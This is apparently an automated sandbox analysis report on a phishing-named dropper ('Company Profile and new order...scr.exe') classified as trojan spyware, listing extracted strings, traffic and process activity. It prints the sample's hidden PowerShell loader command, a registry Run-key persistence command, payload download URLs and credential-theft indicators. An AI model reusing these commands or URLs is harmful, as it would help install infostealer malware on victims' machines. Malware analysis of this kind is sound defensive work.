            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxe
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxe?
            Source: Company Profile and new order-202401127.scr.exe, Company Profile and new order-202401127.scr.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhv7A62.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: msiexec.exe, msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: msiexec.exe, 0000000A.00000002.2878388474.0000000002FF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006B44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/download
            Source: msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/download9
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/download_
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/downloadg
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000328F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c5z
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000325A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000328F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_deskt
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000325A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: msiexec.exe, 0000000A.00000002.2878738738.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2878129912.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878491403.000000000325A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/
            Source: msiexec.exe, 00000006.00000003.2722098799.0000000006BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/5
            Source: msiexec.exe, 00000006.00000003.2721993608.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006B44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn
            Source: msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn2024
            Source: msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzntorage/download/Yo8ryWgWZnzn
            Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49813 version: TLS 1.2
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_0040987A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406DFC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_00406E9F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_004072B5

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Company Profile and new order-202401127.scr.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Company Profile and new order-202401127.scr.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004016FD NtdllDefWindowProc_A,11_2_004016FD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004017B7 NtdllDefWindowProc_A,11_2_004017B7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_00406C3F0_2_00406C3F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F5B5C16_2_22F5B5C1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F671946_2_22F67194
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B04010_2_0044B040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043610D10_2_0043610D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044731010_2_00447310
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A49010_2_0044A490
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040755A10_2_0040755A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C56010_2_0043C560
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B61010_2_0044B610
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044D6C010_2_0044D6C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004476F010_2_004476F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B87010_2_0044B870
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044081D10_2_0044081D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041495710_2_00414957
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004079EE10_2_004079EE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407AEB10_2_00407AEB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044AA8010_2_0044AA80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00412AA910_2_00412AA9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B7410_2_00404B74
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404B0310_2_00404B03
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044BBD810_2_0044BBD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404BE510_2_00404BE5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00404C7610_2_00404C76
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00415CFE10_2_00415CFE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00416D7210_2_00416D72
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D3010_2_00446D30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00446D8B10_2_00446D8B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00406E8F10_2_00406E8F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040503811_2_00405038
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041208C11_2_0041208C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004050A911_2_004050A9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040511A11_2_0040511A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043C13A11_2_0043C13A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004051AB11_2_004051AB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044930011_2_00449300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040D32211_2_0040D322
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A4F011_2_0044A4F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043A5AB11_2_0043A5AB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041363111_2_00413631
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044669011_2_00446690
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A73011_2_0044A730
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004398D811_2_004398D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004498E011_2_004498E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044A88611_2_0044A886
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0043DA0911_2_0043DA09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00438D5E11_2_00438D5E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00449ED011_2_00449ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0041FE8311_2_0041FE83
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00430F5411_2_00430F54
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004050C212_2_004050C2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004014AB12_2_004014AB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040513312_2_00405133
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004051A412_2_004051A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040124612_2_00401246
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040CA4612_2_0040CA46
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040523512_2_00405235
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004032C812_2_004032C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040168912_2_00401689
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00402F6012_2_00402F60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
            Source: Company Profile and new order-202401127.scr.exe, 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebigottes.exeDVarFileInfo$ vs Company Profile and new order-202401127.scr.exe
            Source: Company Profile and new order-202401127.scr.exeBinary or memory string: OriginalFilenamebigottes.exeDVarFileInfo$ vs Company Profile and new order-202401127.scr.exe
            Source: Company Profile and new order-202401127.scr.exe.2.drBinary or memory string: OriginalFilenamebigottes.exeDVarFileInfo$ vs Company Profile and new order-202401127.scr.exe
            Source: Company Profile and new order-202401127.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/15@3/3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,10_2_004182CE
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,12_2_00410DE1
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,10_2_00413D4C
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004148B6
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeFile created: C:\Users\user\Videos\Systemsikkerhed.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-NJ8CFR
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nss3966.tmpJump to behavior
            Source: Company Profile and new order-202401127.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: msiexec.exe, 00000006.00000002.3320063164.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: msiexec.exe, 0000000A.00000003.2877936776.0000000004DC1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878841910.0000000004DCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: Company Profile and new order-202401127.scr.exeVirustotal: Detection: 13%
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeFile read: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33236
            Source: unknownProcess created: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
